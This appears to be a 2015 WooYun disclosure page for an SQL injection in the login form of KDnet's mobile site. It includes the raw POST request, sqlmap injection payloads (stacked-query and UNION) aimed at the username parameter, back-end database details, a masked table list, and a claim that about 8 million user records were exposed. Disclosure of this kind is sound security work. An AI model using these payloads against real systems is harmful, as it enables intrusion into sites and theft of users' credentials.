当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138433

漏洞标题:凯迪某站存在SQL注入涉及800万用户信息(含用户名\密码等)

相关厂商:凯迪网络

漏洞作者: 路人甲

提交时间:2015-09-02 10:17

修复时间:2015-10-17 11:06

公开时间:2015-10-17 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-02: 细节已通知厂商并且等待厂商处理中
2015-09-02: 厂商已经确认,细节仅向厂商公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

详细说明:

http://wap.kdnet.net/

POST /index.php?t=user-login HTTP/1.1
Host: wap.kdnet.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://wap.kdnet.net/?t=user-lf
Cookie: kd_sessionid=355ef2041bc34819c379029c33839cf9; kdnet%5Fuser%5Fintegral=100; kd%5Fsessionid=355ef2041bc34819c379029c33839cf9; PHPSESSID=ditb3l9lrl1ra595o600h0dbu5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
password=g00dPa$$w0rD&t=user-login&username=1

username参数

44.png

11.png

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: password=g00dPa$$w0rD&t=user-login&username=1%'; IF(4600=4600) SELECT 4600 ELSE DROP FUNCTION GxSH--
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: password=g00dPa$$w0rD&t=user-login&username=1%' UNION ALL SELECT CHAR(113)+CHAR(121)+CHAR(115)+CHAR(122)+CHAR(113)+CHAR(109)+CHAR(66)+CHAR(111)+CHAR(81)+CHAR(72)+CHAR(87)+CHAR(116)+CHAR(76)+CHAR(103)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(105)+CHAR(113),NULL,NULL,NULL--
---
web application technology: PHP 5.4.22, Apache 2.2.3
back-end DBMS: Microsoft SQL Server 2008
Database: catnewbbs
[267 tables]
mask 区域
*****--------*****
*****apps *****
*****mmend *****
*****k *****
***** *****
***** *****
***** *****
***** *****
*****r *****
*****r *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****pwReset *****
*****Reset *****
*****Reset *****
***** *****
*****e *****
***** *****
*****20110811*****
*****20111021*****
*****ral_Leve*****
*****ral_Leve*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ssion *****
***** *****
***** *****
***** *****
***** *****
*****nfo *****
***** *****
*****tion *****
***** *****
***** *****
*****le *****
***** *****
*****8 *****
*****8 *****
*****13 *****
*****13 *****
*****k *****
*****sender *****
*****l *****
***** *****
***** *****
***** *****
*****cq *****
*****cq *****
*****sunny *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****h *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****Tmp2 *****
*****Tmp2 *****
***** *****
***** *****
*****26 *****
*****26 *****
*****09 *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****s *****
*****k *****
***** *****
*****eValue1 *****
*****eValue1 *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****e *****
***** *****
*****il *****
*****t_settin*****
*****ic *****
***** *****
***** *****
***** *****
*****20120625*****
***** *****
*****tails *****
*****tails *****
***** *****
***** *****
***** *****
***** *****
*****c_desc *****
***** *****
***** *****
***** *****
*****d_type *****
*****d_type *****
***** *****
***** *****
*****bak1 *****
*****bak1 *****
*****bak1 *****
***** *****
***** *****
***** *****
*****a *****
***** *****
***** *****
***** *****
*****assify *****
***** *****
***** *****
*****ata *****
*****data1 *****
*****ods *****
***** *****
***** *****
*****ak *****
*****ak *****
***** *****
***** *****
***** *****
***** *****
*****rnews_hi*****
*****rnews_hi*****
***** *****
***** *****
***** *****
*****sttel *****
*****sttel *****
*****stuid *****
*****s *****
***** *****
***** *****
***** *****
*****l *****
*****l *****
***** *****
*****124 *****
*****124 *****
***** *****
***** *****
***** *****
*****ery *****
*****_bit *****
*****_bit *****
*****rname *****
*****lintegra*****
*****eryadd *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ls *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ev *****
*****ev *****
*****og *****
***** *****
***** *****
*****ji *****
*****anji *****
*****gin *****
***** *****
***** *****
***** *****
***** *****
*****type *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ompany *****
*****vating *****
*****ine_limi*****
*****back *****
*****email_ev*****
*****form_bin*****
*****n_userid*****
***** *****
*****ist_hist*****
*****ist_hist*****
*****ds *****
*****c_img *****
***** *****
*****ist_hist*****
*****ist_hist*****
*****count *****
*****count *****
*****story *****
*****fei *****
***** *****
***** *****
***** *****
***** *****
*****small *****
***** *****
***** *****
***** *****
*****egister *****
***** *****
*****ylist *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****121017 *****
*****0140124 *****
*****0140124 *****
***** *****
*****d *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ails *****
*****ails *****
***** *****
***** *****
***** *****
*****-------*****

漏洞证明:

800万用户信息:

22.png

33.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-02 11:04

厂商回复:

感谢对凯迪网络支持

最新状态:

暂无


漏洞评价:

评论